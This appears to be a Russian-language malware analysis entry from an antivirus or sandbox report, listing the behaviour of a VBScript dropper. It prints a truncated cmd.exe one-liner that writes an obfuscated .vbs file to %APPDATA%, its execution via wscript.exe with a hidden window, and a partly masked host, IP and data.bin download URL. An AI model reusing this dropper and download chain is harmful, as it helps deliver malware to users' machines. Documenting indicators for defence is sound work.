Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "Gdn=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim NmFJZfG" "fUnctIoN GYmI8dT(N60Z1,Xf)" "ChULw=11" "dIM GH,WsbWd,Jp,B95V2gz,TZFg(5)" "GYT=48" "TZFg(3)=50" "Umw8dGi=4" "TZFg(0)=104" "J8...
- %APPDATA%\3615.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\3615.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "Gdn=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim NmFJZfG" "fUnctIoN GYmI8dT(N60Z1,Xf)" "ChULw=11" "dIM GH,WsbWd,Jp,B95V2gz,TZFg(5)" "GYT=48" "TZFg(3)=50" "Umw8dGi=4" "TZFg(0)=104" "J8...' (со скрытым окном)